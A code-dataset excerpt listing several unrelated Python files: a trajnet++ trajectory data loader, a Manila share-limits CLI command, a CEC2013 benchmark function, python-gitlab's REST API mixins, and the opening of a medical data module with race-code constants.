filename
stringlengths 13
19
| text
stringlengths 134
1.04M
|
---|---|
the-stack_0_6441 | import numpy as np
import torch
import trajnetplusplustools
def pre_process_test(sc_, obs_len=8):
obs_frames = [primary_row.frame for primary_row in sc_[0]][:obs_len]
last_frame = obs_frames[-1]
sc_ = [[row for row in ped] for ped in sc_ if ped[0].frame <= last_frame]
return sc_
def trajnet_loader(data_loader, args):
batch = {'src': [], 'trg': []}
num_batches = 0
for batch_idx, (filename, scene_id, paths) in enumerate(data_loader):
## make new scene
pos_scene = trajnetplusplustools.Reader.paths_to_xy(paths)[:, 0] # primary ped
vel_scene = np.zeros_like(pos_scene)
vel_scene[1:] = pos_scene[1:] - pos_scene[:-1]
attr_scene = np.concatenate((pos_scene, vel_scene), axis=1)
batch['src'].append(attr_scene[:args.obs])
batch['trg'].append(attr_scene[-args.preds:])
num_batches += 1
if (num_batches % args.batch_size != 0) and (batch_idx + 1 != len(data_loader)):
continue
batch['src'] = torch.Tensor(np.stack(batch['src']))
batch['trg'] = torch.Tensor(np.stack(batch['trg']))
yield batch
batch = {'src': [], 'trg': []}
def trajnet_test_loader(data_loader, args):
batch = {'src': [], 'trg': []}
seq_start_end = []
num_batches = 0
for batch_idx, (filename, scene_id, paths) in enumerate(data_loader):
## make new scene
paths = pre_process_test(paths, args.obs)
pos_scene = trajnetplusplustools.Reader.paths_to_xy(paths)
vel_scene = np.zeros_like(pos_scene)
vel_scene[1:] = pos_scene[1:] - pos_scene[:-1]
attr_scene = np.concatenate((pos_scene, vel_scene), axis=2)
seq_start_end.append(pos_scene.shape[1])
batch['src'].append(attr_scene[:args.obs])
batch['trg'].append(attr_scene[-args.preds:])
num_batches += 1
if (num_batches % args.batch_size != 0) and (batch_idx + 1 != len(data_loader)):
continue
batch['src'] = torch.Tensor(np.concatenate(batch['src'], axis=1)).permute(1, 0, 2)
batch['trg'] = torch.Tensor(np.concatenate(batch['trg'], axis=1)).permute(1, 0, 2)
seq_start_end = [0] + seq_start_end
seq_start_end = torch.LongTensor(np.array(seq_start_end).cumsum())
seq_start_end = torch.stack((seq_start_end[:-1], seq_start_end[1:]), dim=1)
yield batch, seq_start_end
batch = {'src': [], 'trg': []}
seq_start_end = []
|
the-stack_0_6443 | # Copyright 2021 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from osc_lib.command import command
from osc_lib import utils as oscutils
from manilaclient.common._i18n import _
class ShareLimitsShow(command.Lister):
"""Show a list of share limits for a user."""
_description = _("Show a list of share limits for a user.")
def get_parser(self, prog_name):
parser = super(ShareLimitsShow, self).get_parser(prog_name)
limit_type_group = parser.add_mutually_exclusive_group(required=True)
limit_type_group.add_argument(
'--absolute',
action='store_true',
default=False,
help=_('Get the absolute limits for the user')
)
limit_type_group.add_argument(
'--rate',
action='store_true',
default=False,
help=_('Get the API rate limits for the user')
)
return parser
def take_action(self, parsed_args):
share_client = self.app.client_manager.share
# limit_type = 'absolute'
if parsed_args.rate:
# limit_type = 'rate'
columns = [
"Verb",
"Regex",
"URI",
"Value",
"Remaining",
"Unit",
"Next Available",
]
data = list(share_client.limits.get().rate)
else:
columns = [
'Name',
'Value',
]
data = list(share_client.limits.get().absolute)
return (columns, (oscutils.get_item_properties(s, columns)
for s in data))
|
the-stack_0_6445 | import numpy as np
from lazy import lazy
from .cec2013lsgo import CEC2013LSGO
class F13(CEC2013LSGO):
"""
7-nonseparable, 1-separable Shifted and Rotated Elliptic Function
"""
def __init__(
self,
*,
rng_seed: int = 42,
use_shuffle: bool = False,
verbose: int = 0
):
super(F13, self).__init__(
rng_seed=rng_seed,
use_shuffle=use_shuffle,
verbose=verbose,
)
self.c = np.cumsum(self.s)
self.m = 5
@property
def genome_size(self) -> np.ndarray:
return 905
@lazy
def lower_bound(self) -> np.ndarray:
lower_bound = [-100] * self.genome_size
return np.array(lower_bound)
@lazy
def upper_bound(self) -> np.ndarray:
upper_bound = [100] * self.genome_size
return np.array(upper_bound)
def _evaluate(self, x: np.ndarray) -> np.ndarray:
out_of_bounds = self.check_bounds(x)
out_of_bounds = np.any(out_of_bounds, axis=1)
x = x - self.xopt
fitness = 0
ldim = 0
for i in range(len(self.s)):
if i > 0:
ldim = self.c[i-1] - i * self.m
udim = self.c[i] - i * self.m
f: np.ndarray
z = x[:, self.p[ldim:udim] - 1].T
if self.s[i] == 25:
f = self.R25
elif self.s[i] == 50:
f = self.R50
elif self.s[i] == 100:
f = self.R100
f = f @ z
f = self._schwefel(f.T)
fitness += self.w[i] * f
fitness[out_of_bounds] = None
return fitness
|
the-stack_0_6446 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013-2017 Gauvain Pocentek <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from types import ModuleType
from typing import (
Any,
Callable,
Dict,
List,
Optional,
Tuple,
Type,
TYPE_CHECKING,
Union,
)
import requests
import gitlab
from gitlab import base, cli
from gitlab import exceptions as exc
from gitlab import types as g_types
from gitlab import utils
__all__ = [
"GetMixin",
"GetWithoutIdMixin",
"RefreshMixin",
"ListMixin",
"RetrieveMixin",
"CreateMixin",
"UpdateMixin",
"SetMixin",
"DeleteMixin",
"CRUDMixin",
"NoUpdateMixin",
"SaveMixin",
"ObjectDeleteMixin",
"UserAgentDetailMixin",
"AccessRequestMixin",
"DownloadMixin",
"SubscribableMixin",
"TodoMixin",
"TimeTrackingMixin",
"ParticipantsMixin",
"BadgeRenderMixin",
]
if TYPE_CHECKING:
# When running mypy we use these as the base classes
_RestManagerBase = base.RESTManager
_RestObjectBase = base.RESTObject
else:
_RestManagerBase = object
_RestObjectBase = object
class GetMixin(_RestManagerBase):
_computed_path: Optional[str]
_from_parent_attrs: Dict[str, Any]
_obj_cls: Optional[Type[base.RESTObject]]
_optional_get_attrs: Tuple[str, ...] = ()
_parent: Optional[base.RESTObject]
_parent_attrs: Dict[str, Any]
_path: Optional[str]
gitlab: gitlab.Gitlab
@exc.on_http_error(exc.GitlabGetError)
def get(
self, id: Union[str, int], lazy: bool = False, **kwargs: Any
) -> base.RESTObject:
"""Retrieve a single object.
Args:
id: ID of the object to retrieve
lazy: If True, don't request the server, but create a
shallow object giving access to the managers. This is
useful if you want to avoid useless calls to the API.
**kwargs: Extra options to send to the server (e.g. sudo)
Returns:
The generated RESTObject.
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabGetError: If the server cannot perform the request
"""
if isinstance(id, str):
id = utils.EncodedId(id)
path = f"{self.path}/{id}"
if TYPE_CHECKING:
assert self._obj_cls is not None
if lazy is True:
if TYPE_CHECKING:
assert self._obj_cls._id_attr is not None
return self._obj_cls(self, {self._obj_cls._id_attr: id})
server_data = self.gitlab.http_get(path, **kwargs)
if TYPE_CHECKING:
assert not isinstance(server_data, requests.Response)
return self._obj_cls(self, server_data)
class GetWithoutIdMixin(_RestManagerBase):
_computed_path: Optional[str]
_from_parent_attrs: Dict[str, Any]
_obj_cls: Optional[Type[base.RESTObject]]
_optional_get_attrs: Tuple[str, ...] = ()
_parent: Optional[base.RESTObject]
_parent_attrs: Dict[str, Any]
_path: Optional[str]
gitlab: gitlab.Gitlab
@exc.on_http_error(exc.GitlabGetError)
def get(
self, id: Optional[Union[int, str]] = None, **kwargs: Any
) -> Optional[base.RESTObject]:
"""Retrieve a single object.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
Returns:
The generated RESTObject
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabGetError: If the server cannot perform the request
"""
if TYPE_CHECKING:
assert self.path is not None
server_data = self.gitlab.http_get(self.path, **kwargs)
if server_data is None:
return None
if TYPE_CHECKING:
assert not isinstance(server_data, requests.Response)
assert self._obj_cls is not None
return self._obj_cls(self, server_data)
class RefreshMixin(_RestObjectBase):
_id_attr: Optional[str]
_attrs: Dict[str, Any]
_module: ModuleType
_parent_attrs: Dict[str, Any]
_updated_attrs: Dict[str, Any]
manager: base.RESTManager
@exc.on_http_error(exc.GitlabGetError)
def refresh(self, **kwargs: Any) -> None:
"""Refresh a single object from server.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
Returns None (updates the object)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabGetError: If the server cannot perform the request
"""
if self._id_attr:
path = f"{self.manager.path}/{self.encoded_id}"
else:
if TYPE_CHECKING:
assert self.manager.path is not None
path = self.manager.path
server_data = self.manager.gitlab.http_get(path, **kwargs)
if TYPE_CHECKING:
assert not isinstance(server_data, requests.Response)
self._update_attrs(server_data)
class ListMixin(_RestManagerBase):
_computed_path: Optional[str]
_from_parent_attrs: Dict[str, Any]
_list_filters: Tuple[str, ...] = ()
_obj_cls: Optional[Type[base.RESTObject]]
_parent: Optional[base.RESTObject]
_parent_attrs: Dict[str, Any]
_path: Optional[str]
gitlab: gitlab.Gitlab
@exc.on_http_error(exc.GitlabListError)
def list(self, **kwargs: Any) -> Union[base.RESTObjectList, List[base.RESTObject]]:
"""Retrieve a list of objects.
Args:
all: If True, return all the items, without pagination
per_page: Number of items to retrieve per request
page: ID of the page to return (starts with page 1)
as_list: If set to False and no pagination option is
defined, return a generator instead of a list
**kwargs: Extra options to send to the server (e.g. sudo)
Returns:
The list of objects, or a generator if `as_list` is False
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabListError: If the server cannot perform the request
"""
# Duplicate data to avoid messing with what the user sent us
data = kwargs.copy()
if self.gitlab.per_page:
data.setdefault("per_page", self.gitlab.per_page)
# global keyset pagination
if self.gitlab.pagination:
data.setdefault("pagination", self.gitlab.pagination)
if self.gitlab.order_by:
data.setdefault("order_by", self.gitlab.order_by)
# We get the attributes that need some special transformation
if self._types:
for attr_name, type_cls in self._types.items():
if attr_name in data.keys():
type_obj = type_cls(data[attr_name])
data[attr_name] = type_obj.get_for_api()
# Allow to overwrite the path, handy for custom listings
path = data.pop("path", self.path)
if TYPE_CHECKING:
assert self._obj_cls is not None
obj = self.gitlab.http_list(path, **data)
if isinstance(obj, list):
return [self._obj_cls(self, item, created_from_list=True) for item in obj]
else:
return base.RESTObjectList(self, self._obj_cls, obj)
class RetrieveMixin(ListMixin, GetMixin):
_computed_path: Optional[str]
_from_parent_attrs: Dict[str, Any]
_obj_cls: Optional[Type[base.RESTObject]]
_parent: Optional[base.RESTObject]
_parent_attrs: Dict[str, Any]
_path: Optional[str]
gitlab: gitlab.Gitlab
pass
class CreateMixin(_RestManagerBase):
_computed_path: Optional[str]
_from_parent_attrs: Dict[str, Any]
_obj_cls: Optional[Type[base.RESTObject]]
_parent: Optional[base.RESTObject]
_parent_attrs: Dict[str, Any]
_path: Optional[str]
gitlab: gitlab.Gitlab
def _check_missing_create_attrs(self, data: Dict[str, Any]) -> None:
missing = []
for attr in self._create_attrs.required:
if attr not in data:
missing.append(attr)
continue
if missing:
raise AttributeError(f"Missing attributes: {', '.join(missing)}")
@exc.on_http_error(exc.GitlabCreateError)
def create(
self, data: Optional[Dict[str, Any]] = None, **kwargs: Any
) -> base.RESTObject:
"""Create a new object.
Args:
data: parameters to send to the server to create the
resource
**kwargs: Extra options to send to the server (e.g. sudo)
Returns:
A new instance of the managed object class built with
the data sent by the server
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabCreateError: If the server cannot perform the request
"""
if data is None:
data = {}
self._check_missing_create_attrs(data)
files = {}
# We get the attributes that need some special transformation
if self._types:
# Duplicate data to avoid messing with what the user sent us
data = data.copy()
for attr_name, type_cls in self._types.items():
if attr_name in data.keys():
type_obj = type_cls(data[attr_name])
# if the type if FileAttribute we need to pass the data as
# file
if isinstance(type_obj, g_types.FileAttribute):
k = type_obj.get_file_name(attr_name)
files[attr_name] = (k, data.pop(attr_name))
else:
data[attr_name] = type_obj.get_for_api()
# Handle specific URL for creation
path = kwargs.pop("path", self.path)
server_data = self.gitlab.http_post(path, post_data=data, files=files, **kwargs)
if TYPE_CHECKING:
assert not isinstance(server_data, requests.Response)
assert self._obj_cls is not None
return self._obj_cls(self, server_data)
class UpdateMixin(_RestManagerBase):
_computed_path: Optional[str]
_from_parent_attrs: Dict[str, Any]
_obj_cls: Optional[Type[base.RESTObject]]
_parent: Optional[base.RESTObject]
_parent_attrs: Dict[str, Any]
_path: Optional[str]
_update_uses_post: bool = False
gitlab: gitlab.Gitlab
def _check_missing_update_attrs(self, data: Dict[str, Any]) -> None:
if TYPE_CHECKING:
assert self._obj_cls is not None
# Remove the id field from the required list as it was previously moved
# to the http path.
required = tuple(
[k for k in self._update_attrs.required if k != self._obj_cls._id_attr]
)
missing = []
for attr in required:
if attr not in data:
missing.append(attr)
continue
if missing:
raise AttributeError(f"Missing attributes: {', '.join(missing)}")
def _get_update_method(
self,
) -> Callable[..., Union[Dict[str, Any], requests.Response]]:
"""Return the HTTP method to use.
Returns:
http_put (default) or http_post
"""
if self._update_uses_post:
http_method = self.gitlab.http_post
else:
http_method = self.gitlab.http_put
return http_method
@exc.on_http_error(exc.GitlabUpdateError)
def update(
self,
id: Optional[Union[str, int]] = None,
new_data: Optional[Dict[str, Any]] = None,
**kwargs: Any,
) -> Dict[str, Any]:
"""Update an object on the server.
Args:
id: ID of the object to update (can be None if not required)
new_data: the update data for the object
**kwargs: Extra options to send to the server (e.g. sudo)
Returns:
The new object data (*not* a RESTObject)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabUpdateError: If the server cannot perform the request
"""
new_data = new_data or {}
if id is None:
path = self.path
else:
path = f"{self.path}/{utils.EncodedId(id)}"
self._check_missing_update_attrs(new_data)
files = {}
# We get the attributes that need some special transformation
if self._types:
# Duplicate data to avoid messing with what the user sent us
new_data = new_data.copy()
for attr_name, type_cls in self._types.items():
if attr_name in new_data.keys():
type_obj = type_cls(new_data[attr_name])
# if the type if FileAttribute we need to pass the data as
# file
if isinstance(type_obj, g_types.FileAttribute):
k = type_obj.get_file_name(attr_name)
files[attr_name] = (k, new_data.pop(attr_name))
else:
new_data[attr_name] = type_obj.get_for_api()
http_method = self._get_update_method()
result = http_method(path, post_data=new_data, files=files, **kwargs)
if TYPE_CHECKING:
assert not isinstance(result, requests.Response)
return result
class SetMixin(_RestManagerBase):
_computed_path: Optional[str]
_from_parent_attrs: Dict[str, Any]
_obj_cls: Optional[Type[base.RESTObject]]
_parent: Optional[base.RESTObject]
_parent_attrs: Dict[str, Any]
_path: Optional[str]
gitlab: gitlab.Gitlab
@exc.on_http_error(exc.GitlabSetError)
def set(self, key: str, value: str, **kwargs: Any) -> base.RESTObject:
"""Create or update the object.
Args:
key: The key of the object to create/update
value: The value to set for the object
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabSetError: If an error occurred
Returns:
The created/updated attribute
"""
path = f"{self.path}/{utils.EncodedId(key)}"
data = {"value": value}
server_data = self.gitlab.http_put(path, post_data=data, **kwargs)
if TYPE_CHECKING:
assert not isinstance(server_data, requests.Response)
assert self._obj_cls is not None
return self._obj_cls(self, server_data)
class DeleteMixin(_RestManagerBase):
_computed_path: Optional[str]
_from_parent_attrs: Dict[str, Any]
_obj_cls: Optional[Type[base.RESTObject]]
_parent: Optional[base.RESTObject]
_parent_attrs: Dict[str, Any]
_path: Optional[str]
gitlab: gitlab.Gitlab
@exc.on_http_error(exc.GitlabDeleteError)
def delete(self, id: Optional[Union[str, int]] = None, **kwargs: Any) -> None:
"""Delete an object on the server.
Args:
id: ID of the object to delete
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabDeleteError: If the server cannot perform the request
"""
if id is None:
path = self.path
else:
path = f"{self.path}/{utils.EncodedId(id)}"
if TYPE_CHECKING:
assert path is not None
self.gitlab.http_delete(path, **kwargs)
class CRUDMixin(GetMixin, ListMixin, CreateMixin, UpdateMixin, DeleteMixin):
_computed_path: Optional[str]
_from_parent_attrs: Dict[str, Any]
_obj_cls: Optional[Type[base.RESTObject]]
_parent: Optional[base.RESTObject]
_parent_attrs: Dict[str, Any]
_path: Optional[str]
gitlab: gitlab.Gitlab
pass
class NoUpdateMixin(GetMixin, ListMixin, CreateMixin, DeleteMixin):
_computed_path: Optional[str]
_from_parent_attrs: Dict[str, Any]
_obj_cls: Optional[Type[base.RESTObject]]
_parent: Optional[base.RESTObject]
_parent_attrs: Dict[str, Any]
_path: Optional[str]
gitlab: gitlab.Gitlab
pass
class SaveMixin(_RestObjectBase):
"""Mixin for RESTObject's that can be updated."""
_id_attr: Optional[str]
_attrs: Dict[str, Any]
_module: ModuleType
_parent_attrs: Dict[str, Any]
_updated_attrs: Dict[str, Any]
manager: base.RESTManager
def _get_updated_data(self) -> Dict[str, Any]:
updated_data = {}
for attr in self.manager._update_attrs.required:
# Get everything required, no matter if it's been updated
updated_data[attr] = getattr(self, attr)
# Add the updated attributes
updated_data.update(self._updated_attrs)
return updated_data
def save(self, **kwargs: Any) -> Optional[Dict[str, Any]]:
"""Save the changes made to the object to the server.
The object is updated to match what the server returns.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
Returns:
The new object data (*not* a RESTObject)
Raise:
GitlabAuthenticationError: If authentication is not correct
GitlabUpdateError: If the server cannot perform the request
"""
updated_data = self._get_updated_data()
# Nothing to update. Server fails if sent an empty dict.
if not updated_data:
return None
# call the manager
obj_id = self.encoded_id
if TYPE_CHECKING:
assert isinstance(self.manager, UpdateMixin)
server_data = self.manager.update(obj_id, updated_data, **kwargs)
self._update_attrs(server_data)
return server_data
class ObjectDeleteMixin(_RestObjectBase):
"""Mixin for RESTObject's that can be deleted."""
_id_attr: Optional[str]
_attrs: Dict[str, Any]
_module: ModuleType
_parent_attrs: Dict[str, Any]
_updated_attrs: Dict[str, Any]
manager: base.RESTManager
def delete(self, **kwargs: Any) -> None:
"""Delete the object from the server.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabDeleteError: If the server cannot perform the request
"""
if TYPE_CHECKING:
assert isinstance(self.manager, DeleteMixin)
assert self.encoded_id is not None
self.manager.delete(self.encoded_id, **kwargs)
class UserAgentDetailMixin(_RestObjectBase):
_id_attr: Optional[str]
_attrs: Dict[str, Any]
_module: ModuleType
_parent_attrs: Dict[str, Any]
_updated_attrs: Dict[str, Any]
manager: base.RESTManager
@cli.register_custom_action(("Snippet", "ProjectSnippet", "ProjectIssue"))
@exc.on_http_error(exc.GitlabGetError)
def user_agent_detail(self, **kwargs: Any) -> Dict[str, Any]:
"""Get the user agent detail.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabGetError: If the server cannot perform the request
"""
path = f"{self.manager.path}/{self.encoded_id}/user_agent_detail"
result = self.manager.gitlab.http_get(path, **kwargs)
if TYPE_CHECKING:
assert not isinstance(result, requests.Response)
return result
class AccessRequestMixin(_RestObjectBase):
_id_attr: Optional[str]
_attrs: Dict[str, Any]
_module: ModuleType
_parent_attrs: Dict[str, Any]
_updated_attrs: Dict[str, Any]
manager: base.RESTManager
@cli.register_custom_action(
("ProjectAccessRequest", "GroupAccessRequest"), (), ("access_level",)
)
@exc.on_http_error(exc.GitlabUpdateError)
def approve(
self, access_level: int = gitlab.const.DEVELOPER_ACCESS, **kwargs: Any
) -> None:
"""Approve an access request.
Args:
access_level: The access level for the user
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabUpdateError: If the server fails to perform the request
"""
path = f"{self.manager.path}/{self.encoded_id}/approve"
data = {"access_level": access_level}
server_data = self.manager.gitlab.http_put(path, post_data=data, **kwargs)
if TYPE_CHECKING:
assert not isinstance(server_data, requests.Response)
self._update_attrs(server_data)
class DownloadMixin(_RestObjectBase):
_id_attr: Optional[str]
_attrs: Dict[str, Any]
_module: ModuleType
_parent_attrs: Dict[str, Any]
_updated_attrs: Dict[str, Any]
manager: base.RESTManager
@cli.register_custom_action(("GroupExport", "ProjectExport"))
@exc.on_http_error(exc.GitlabGetError)
def download(
self,
streamed: bool = False,
action: Optional[Callable] = None,
chunk_size: int = 1024,
**kwargs: Any,
) -> Optional[bytes]:
"""Download the archive of a resource export.
Args:
streamed: If True the data will be processed by chunks of
`chunk_size` and each chunk is passed to `action` for
treatment
action: Callable responsible of dealing with chunk of
data
chunk_size: Size of each chunk
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabGetError: If the server failed to perform the request
Returns:
The blob content if streamed is False, None otherwise
"""
path = f"{self.manager.path}/download"
result = self.manager.gitlab.http_get(
path, streamed=streamed, raw=True, **kwargs
)
if TYPE_CHECKING:
assert isinstance(result, requests.Response)
return utils.response_content(result, streamed, action, chunk_size)
class SubscribableMixin(_RestObjectBase):
_id_attr: Optional[str]
_attrs: Dict[str, Any]
_module: ModuleType
_parent_attrs: Dict[str, Any]
_updated_attrs: Dict[str, Any]
manager: base.RESTManager
@cli.register_custom_action(
("ProjectIssue", "ProjectMergeRequest", "ProjectLabel", "GroupLabel")
)
@exc.on_http_error(exc.GitlabSubscribeError)
def subscribe(self, **kwargs: Any) -> None:
"""Subscribe to the object notifications.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
raises:
GitlabAuthenticationError: If authentication is not correct
GitlabSubscribeError: If the subscription cannot be done
"""
path = f"{self.manager.path}/{self.encoded_id}/subscribe"
server_data = self.manager.gitlab.http_post(path, **kwargs)
if TYPE_CHECKING:
assert not isinstance(server_data, requests.Response)
self._update_attrs(server_data)
@cli.register_custom_action(
("ProjectIssue", "ProjectMergeRequest", "ProjectLabel", "GroupLabel")
)
@exc.on_http_error(exc.GitlabUnsubscribeError)
def unsubscribe(self, **kwargs: Any) -> None:
"""Unsubscribe from the object notifications.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
raises:
GitlabAuthenticationError: If authentication is not correct
GitlabUnsubscribeError: If the unsubscription cannot be done
"""
path = f"{self.manager.path}/{self.encoded_id}/unsubscribe"
server_data = self.manager.gitlab.http_post(path, **kwargs)
if TYPE_CHECKING:
assert not isinstance(server_data, requests.Response)
self._update_attrs(server_data)
class TodoMixin(_RestObjectBase):
_id_attr: Optional[str]
_attrs: Dict[str, Any]
_module: ModuleType
_parent_attrs: Dict[str, Any]
_updated_attrs: Dict[str, Any]
manager: base.RESTManager
@cli.register_custom_action(("ProjectIssue", "ProjectMergeRequest"))
@exc.on_http_error(exc.GitlabTodoError)
def todo(self, **kwargs: Any) -> None:
"""Create a todo associated to the object.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabTodoError: If the todo cannot be set
"""
path = f"{self.manager.path}/{self.encoded_id}/todo"
self.manager.gitlab.http_post(path, **kwargs)
class TimeTrackingMixin(_RestObjectBase):
_id_attr: Optional[str]
_attrs: Dict[str, Any]
_module: ModuleType
_parent_attrs: Dict[str, Any]
_updated_attrs: Dict[str, Any]
manager: base.RESTManager
@cli.register_custom_action(("ProjectIssue", "ProjectMergeRequest"))
@exc.on_http_error(exc.GitlabTimeTrackingError)
def time_stats(self, **kwargs: Any) -> Dict[str, Any]:
"""Get time stats for the object.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabTimeTrackingError: If the time tracking update cannot be done
"""
# Use the existing time_stats attribute if it exist, otherwise make an
# API call
if "time_stats" in self.attributes:
return self.attributes["time_stats"]
path = f"{self.manager.path}/{self.encoded_id}/time_stats"
result = self.manager.gitlab.http_get(path, **kwargs)
if TYPE_CHECKING:
assert not isinstance(result, requests.Response)
return result
@cli.register_custom_action(("ProjectIssue", "ProjectMergeRequest"), ("duration",))
@exc.on_http_error(exc.GitlabTimeTrackingError)
def time_estimate(self, duration: str, **kwargs: Any) -> Dict[str, Any]:
"""Set an estimated time of work for the object.
Args:
duration: Duration in human format (e.g. 3h30)
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabTimeTrackingError: If the time tracking update cannot be done
"""
path = f"{self.manager.path}/{self.encoded_id}/time_estimate"
data = {"duration": duration}
result = self.manager.gitlab.http_post(path, post_data=data, **kwargs)
if TYPE_CHECKING:
assert not isinstance(result, requests.Response)
return result
@cli.register_custom_action(("ProjectIssue", "ProjectMergeRequest"))
@exc.on_http_error(exc.GitlabTimeTrackingError)
def reset_time_estimate(self, **kwargs: Any) -> Dict[str, Any]:
"""Resets estimated time for the object to 0 seconds.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabTimeTrackingError: If the time tracking update cannot be done
"""
path = f"{self.manager.path}/{self.encoded_id}/reset_time_estimate"
result = self.manager.gitlab.http_post(path, **kwargs)
if TYPE_CHECKING:
assert not isinstance(result, requests.Response)
return result
@cli.register_custom_action(("ProjectIssue", "ProjectMergeRequest"), ("duration",))
@exc.on_http_error(exc.GitlabTimeTrackingError)
def add_spent_time(self, duration: str, **kwargs: Any) -> Dict[str, Any]:
"""Add time spent working on the object.
Args:
duration: Duration in human format (e.g. 3h30)
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabTimeTrackingError: If the time tracking update cannot be done
"""
path = f"{self.manager.path}/{self.encoded_id}/add_spent_time"
data = {"duration": duration}
result = self.manager.gitlab.http_post(path, post_data=data, **kwargs)
if TYPE_CHECKING:
assert not isinstance(result, requests.Response)
return result
@cli.register_custom_action(("ProjectIssue", "ProjectMergeRequest"))
@exc.on_http_error(exc.GitlabTimeTrackingError)
def reset_spent_time(self, **kwargs: Any) -> Dict[str, Any]:
"""Resets the time spent working on the object.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabTimeTrackingError: If the time tracking update cannot be done
"""
path = f"{self.manager.path}/{self.encoded_id}/reset_spent_time"
result = self.manager.gitlab.http_post(path, **kwargs)
if TYPE_CHECKING:
assert not isinstance(result, requests.Response)
return result
class ParticipantsMixin(_RestObjectBase):
_id_attr: Optional[str]
_attrs: Dict[str, Any]
_module: ModuleType
_parent_attrs: Dict[str, Any]
_updated_attrs: Dict[str, Any]
manager: base.RESTManager
@cli.register_custom_action(("ProjectMergeRequest", "ProjectIssue"))
@exc.on_http_error(exc.GitlabListError)
def participants(self, **kwargs: Any) -> Dict[str, Any]:
"""List the participants.
Args:
all: If True, return all the items, without pagination
per_page: Number of items to retrieve per request
page: ID of the page to return (starts with page 1)
as_list: If set to False and no pagination option is
defined, return a generator instead of a list
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabListError: If the list could not be retrieved
Returns:
The list of participants
"""
path = f"{self.manager.path}/{self.encoded_id}/participants"
result = self.manager.gitlab.http_get(path, **kwargs)
if TYPE_CHECKING:
assert not isinstance(result, requests.Response)
return result
class BadgeRenderMixin(_RestManagerBase):
@cli.register_custom_action(
("GroupBadgeManager", "ProjectBadgeManager"), ("link_url", "image_url")
)
@exc.on_http_error(exc.GitlabRenderError)
def render(self, link_url: str, image_url: str, **kwargs: Any) -> Dict[str, Any]:
"""Preview link_url and image_url after interpolation.
Args:
link_url: URL of the badge link
image_url: URL of the badge image
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabRenderError: If the rendering failed
Returns:
The rendering properties
"""
path = f"{self.path}/render"
data = {"link_url": link_url, "image_url": image_url}
result = self.gitlab.http_get(path, data, **kwargs)
if TYPE_CHECKING:
assert not isinstance(result, requests.Response)
return result
class PromoteMixin(_RestObjectBase):
_id_attr: Optional[str]
_attrs: Dict[str, Any]
_module: ModuleType
_parent_attrs: Dict[str, Any]
_updated_attrs: Dict[str, Any]
_update_uses_post: bool = False
manager: base.RESTManager
def _get_update_method(
self,
) -> Callable[..., Union[Dict[str, Any], requests.Response]]:
"""Return the HTTP method to use.
Returns:
http_put (default) or http_post
"""
if self._update_uses_post:
http_method = self.manager.gitlab.http_post
else:
http_method = self.manager.gitlab.http_put
return http_method
@exc.on_http_error(exc.GitlabPromoteError)
def promote(self, **kwargs: Any) -> Dict[str, Any]:
"""Promote the item.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabPromoteError: If the item could not be promoted
GitlabParsingError: If the json data could not be parsed
Returns:
The updated object data (*not* a RESTObject)
"""
path = f"{self.manager.path}/{self.encoded_id}/promote"
http_method = self._get_update_method()
result = http_method(path, **kwargs)
if TYPE_CHECKING:
assert not isinstance(result, requests.Response)
return result
|
the-stack_0_6448 | import json
import numpy as np
import pdb
import copy
import torch
from scipy.special import binom
MISSING_VALUE = -1
HASNT_HAPPENED_VALUE = -5
RACE_CODE_TO_NAME = {
1: 'White',
2: 'African American',
3: 'American Indian, Eskimo, Aleut',
4: 'Asian or Pacific Islander',
5: 'Other Race',
6: 'Caribbean/West Indian',
